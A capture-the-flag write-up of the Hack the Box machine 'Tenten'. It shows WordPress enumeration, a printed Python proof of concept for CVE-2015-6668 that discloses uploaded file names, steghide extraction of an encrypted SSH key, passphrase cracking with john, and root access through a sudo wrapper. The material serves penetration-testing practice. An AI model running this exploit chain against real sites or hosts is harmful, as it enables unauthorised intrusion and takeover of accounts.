Today we are going to solve another CTF challenge “Tenten” which is available online for those who want to increase their skill in penetration testing and black box testing. Tenten is a retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have a collection of vulnerable labs as challenges from beginners to Expert level.
Level: Medium
Task: find user.txt and root.txt file in the victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.10 so let’s begin with nmap port enumeration.
root@kali:~/htb/tenten# nmap -sC 10.10.10.10 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 20:21 CET Nmap scan report for 10.10.10.10 Host is up (0.028s latency). Not shown: 998 filtered ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA) | 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA) |_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519) 80/tcp open http |_http-generator: WordPress 4.7.3 |_http-title: Job Portal – Just another WordPress site Nmap done: 1 IP address (1 host up) scanned in 24.11 seconds
Knowing port 80 is open in victim’s network we preferred to explore his IP in the browser the page indicates that is a WordPress website.
Now we decided to use wpscan, on the URL that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins etc.
root@kali:~/htb/tenten# wpscan --url http://10.10.10.10/ --enumerate u [+] URL: http://10.10.10.10/ [+] Started: Mon Feb 11 20:32:12 2019 --snip-- [+] Enumerating Users Brute Forcing Author IDs - Time: 00:00:00 <==================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] takis | Detected By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Finished: Mon Feb 11 20:32:17 2019 [+] Requests Done: 2 [+] Cached Requests: 54 [+] Data Sent: 497 B [+] Data Received: 4.543 KB [+] Memory used: 13.867 MB [+] Elapsed time: 00:00:04
The wpscan has enumerated the username as takis.
root@kali:~/htb/tenten# wpscan --url http://10.10.10.10/ --enumerate p [+] Enumerating Most Popular Plugins [+] Checking Plugin Versions [i] Plugin(s) Identified: [+] job-manager | Location: http://10.10.10.10/wp-content/plugins/job-manager/ | Latest Version: 0.7.25 (up to date) | Last Updated: 2015-08-25T22:44:00.000Z | | Detected By: Urls In Homepage (Passive Detection) | | [!] 1 vulnerability identified: | | [!] Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference | References: | - https://wpvulndb.com/vulnerabilities/8167 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668 | - https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/ | | Version: 7.2.5 (80% confidence) | Detected By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt [+] Finished: Mon Feb 11 20:35:50 2019 [+] Requests Done: 31 [+] Cached Requests: 3 [+] Data Sent: 6.433 KB [+] Data Received: 326.415 KB [+] Memory used: 66.34 MB [+] Elapsed time: 00:00:07
The Job-manager plugin has a CVE-2015-6668
Visit http://10.10.10.10/index.php/ and click on Job Listing and click on Apply .In the URL you’ll see the URL is http://10.10.10.10/index.php/jobs/apply/8/
We see there’s a number in the end. It is an ID from the wordpress mysql database.
Lets Fuzz for more pages
root@kali:~/htb/tenten# for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done 1: <title>Job Application: Hello world! – Job Portal</title> 2: <title>Job Application: Sample Page – Job Portal</title> 3: <title>Job Application: Auto Draft – Job Portal</title> 4: <title>Job Application – Job Portal</title> 5: <title>Job Application: Jobs Listing – Job Portal</title> 6: <title>Job Application: Job Application – Job Portal</title> 7: <title>Job Application: Register – Job Portal</title> 8: <title>Job Application: Pen Tester – Job Portal</title> 9: <title>Job Application: – Job Portal</title> 10: <title>Job Application: Application – Job Portal</title> 11: <title>Job Application: cube – Job Portal</title> 12: <title>Job Application: Application – Job Portal</title> 13: <title>Job Application: HackerAccessGranted – Job Portal</title> 14: <title>Job Application – Job Portal</title> 15: <title>Job Application – Job Portal</title> 16: <title>Job Application – Job Portal</title> 17: <title>Job Application – Job Portal</title> 18: <title>Job Application – Job Portal</title> 19: <title>Job Application – Job Portal</title> 20: <title>Job Application – Job Portal</title>
The content on 13th line HackerAccessGranted looks interesting.
According to the CVE:
The wordpress directory structure for the uploaded files is known as /wp-content/uploads/%year%/%month%/%filename%
To find the exact file location
c:\PENTEST>type CVE-2015-6668.py
import requests
print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')
filename2 = filename.replace(" ", "-")
for year in range(2013,2018):
for i in range(1,13):
for extension in {'jpg','jpeg','png'}:
URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
req = requests.get(URL)
if req.status_code==200:
print "[+] URL of CV found! " + URL
c:\PENTEST>python CVE-2015-6668.py CVE-2015-6668 Title: CV filename disclosure on Job-Manager WP Plugin Author: Evangelos Mourikis Blog: https://vagmour.eu Plugin URL: http://www.wp-jobmanager.com Versions: <=0.7.25 Enter a vulnerable website: http://10.10.10.10 Enter a file name: HackerAccessGranted [+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Next
Visit http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Download the image
root@kali:~/htb/tenten# wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg --2019-02-11 20:46:19-- http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg Connecting to 10.10.10.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 262408 (256K) [image/jpeg] Saving to: ‘HackerAccessGranted.jpg’ HackerAccessGranted.jpg 100%[===============================>] 256.26K 1.11MB/s in 0.2s 2019-02-11 20:46:20 (1.11 MB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]
Use steghide with no passphrase
root@kali:~/htb/tenten# steghide extract -sf HackerAccessGranted.jpg Enter passphrase: wrote extracted data to "id_rsa". root@kali:~/htb/tenten# cat id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C /HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo 1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g 2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo 6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9 4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF 2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7 L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv 5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB 9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP -----END RSA PRIVATE KEY-----
Use sshng2john.py
https://github.com/truongkma/ctf-tools/blob/master/John/run/sshng2john.py
root@kali:~/htb/tenten# python sshng2john.py id_rsa > id_rsa.encrypted
root@kali:~/htb/tenten# ls
id_rsa id_rsa.encrypted
Use john to get passphrase
root@kali:~/htb/tenten# john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH-ng [RSA/DSA 32/64]) Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status superpassword (id_rsa) 1g 0:00:00:30 DONE (2019-02-11 20:56) 0.03305g/s 474168p/s 474168c/s 474168C/s *7¡Vamos! Session completed
SSH
root@kali:~/htb/tenten# chmod 600 id_rsa root@kali:~/htb/tenten# ssh -i id_rsa takis@10.10.10.10 Enter passphrase for key 'id_rsa': superpassword Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 65 packages can be updated. 39 updates are security updates. Last login: Mon Feb 11 21:56:45 2019 from 10.10.14.21 takis@tenten:~$ cat user.txt e5c*****f31 takis@tenten:~$ strings /bin/fuckin #!/bin/bash $1 $2 $3 $4 takis@tenten:~$ sudo fuckin id uid=0(root) gid=0(root) groups=0(root) takis@tenten:~$ sudo fuckin cat /root/root.txt f9f*****603
Author : Jacco Straathof